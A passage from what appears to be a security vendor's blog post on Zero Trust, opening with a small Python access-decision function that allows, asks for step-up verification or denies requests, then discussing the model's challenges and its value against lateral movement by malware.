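    resource_sensitivity: int  # 1 (low) .. 3 (high), e.g. 3 for customer PII

def decide(req: AccessRequest) -> str:
    """Return 'allow', 'step-up' (ask for more verification), or 'deny'."""
    risk = 0
    risk += 0 if req.device_managed else 2
    risk += 0 if req.network_known else 1
    risk += req.resource_sensitivity - 1

    if not req.mfa_satisfied:
        return "step-up"   # never trust: an unverified identity must re-authenticate
    if risk >= 4:
        return "deny"      # too risky even with MFA (e.g. PII from an unmanaged device)
    if risk >= 2:
        return "step-up"   # allow only after an extra check or with reduced functionality
    return "allow"

if __name__ == "__main__":
    print(decide(AccessRequest("u1", True, True, True, 1)))    # allow
    print(decide(AccessRequest("u1", True, False, False, 3)))  # deny
    print(decide(AccessRequest("u2", False, True, True, 2)))   # step-up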
Finally, drawing a thread through all of these pillars is the importance of security orchestration. Even without a security management system, organizations using Zero Trust would need to ensure that security solutions work well together and cover all the possible attack vectors. Overlap is not a problem by itself, but it can be tricky to find the right settings to maximize efficiency and minimize conflicts.
Challenges of the Zero Trust strategy
Zero Trust is billed as a comprehensive approach to securing access across networks, applications, and environments from users, end-user devices, APIs, IoT, micro-services, containers, and more. While aiming to protect the workforce, workloads, and workplace, Zero Trust does encounter some challenges. These include:
- More and different kinds of users (in office and remote)
- More and different kinds of devices (mobile, IoT, biotech)
- More and different kinds of applications (CMSes, intranet, design platforms)
- More ways to access and store data (drive, cloud, edge)
In the not-too-distant past, it was commonplace for the vast majority of the workforce to spend the entirety of their working hours at their place of employment. Not true today, where, according to Forbes, at least 50 percent of the US population engages in some form of remote work. That means accessing data from home IPs, routers, or public Wi-Fi, unless using a VPN service. But users are not necessarily limited to the workforce. Customers sometimes need to access an organization's resources, depending on the industry. Consider customers who want to select orders for their next delivery, check on inventory, participate in demos or trials, and of course access a company's website. Suppliers and third-party service companies may need access to other parts of an organization's infrastructure to check on operations, safety, and progress. All of these instances point to a wide variation in user base and a larger number of access points to cover. Coming up with specific policies for each of these groups and individuals can be time-consuming, and maintaining the constant influx of new employees and customers will add considerable workload for whoever manages this task moving forward.
In this era of BYOD policies and IoT equipment, plus the "always on" mentality that sometimes strikes remote employees, organizations must allow for a great variation in devices used for work, as well as the operating systems that come with them. Each of these devices has its own properties, requirements, and communication protocols, which will need to be tracked and secured under the Zero Trust model. Once again, this requires a bit more work upfront but likely yields positive results.
Another challenging factor to take into account when adopting a Zero Trust strategy is the number of applications in use across the organization for people and teams to collaborate and communicate. The most versatile of these apps are cloud-based and can be used across multiple platforms. This versatility can, however, be a complicating factor when deciding what you want to allow and what you don't. Are the apps shared with third-party services, agencies, or vendors? Are the communication platforms outward-facing, and not just for employees? Is this application necessary only for a particular department, such as finance, design, or programming? All of these questions must be asked and answered before blindly adopting a stack of 60 applications for the entire workforce.
One reason why the old security policies are growing out of favor is that there's no one, fixed location that needs to be protected any longer.
Organizations can't just protect endpoints or corporate networks. More and more resources, data, and even applications are stored in cloud-based environments, meaning they can be accessed from anywhere and may rely on server farms in various global locations. This is further complicated by the potential shift to edge computing, which will require IT teams to switch from a centralized, top-down infrastructure to a decentralized trust model. As we have seen in our series about leaky cloud resources (AWS buckets and elastic servers), the configuration of data infrastructure in cloud services and beyond will need to be flawless if businesses don't want it to end up as the weakest link in their Zero Trust strategy.
To trust or not to trust
Overhauling to a Zero Trust security framework isn't easily accomplished, but it's one we feel strengthens an organization's overall security posture and awareness. IT teams looking to convince executives of the old guard might look for prime opportunities, then, to make their argument. For example, if there's already a planned move to cloud-based resources, that's a good time to suggest also adopting Zero Trust. Changes in the threat landscape, including recent vulnerabilities in VPNs and Citrix, plus ransomware being delivered through Remote Desktop Protocol (RDP), might encourage more organizations to investigate a Zero Trust solution, if only for identity and access management. These organizations will have to allow for a transition period and be prepared for some major changes.
A proper Zero Trust framework that doesn't automatically allow traffic inside the perimeter will certainly hinder the lateral threat movement that hackers use to tighten their grip on a breached network. Top business-focused threats such as Emotet and TrickBot would be hindered from spreading, as they'd be unable to work their way from server to server in a segmented network. Since the point of infiltration is usually not the target location of an attacker, setting up internal perimeters can also limit the severity of a successful attack. Add to these layers strong data security hygiene and intelligent orchestration that provides wide coverage across threat types, operating systems, and platforms, and businesses have a security framework that'd be pretty tough to beat today. In our eyes, that makes Zero Trust a hero.
<urn:uuid:25302394-d3f3-4109-b50c-47cafe11f663>
CC-MAIN-2022-40
https://www.malwarebytes.com/blog/news/2020/01/explained-the-strengths-and-weaknesses-of-the-zero-trust-model
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00222.warc.gz
en
0.938021
2,465
2.625
3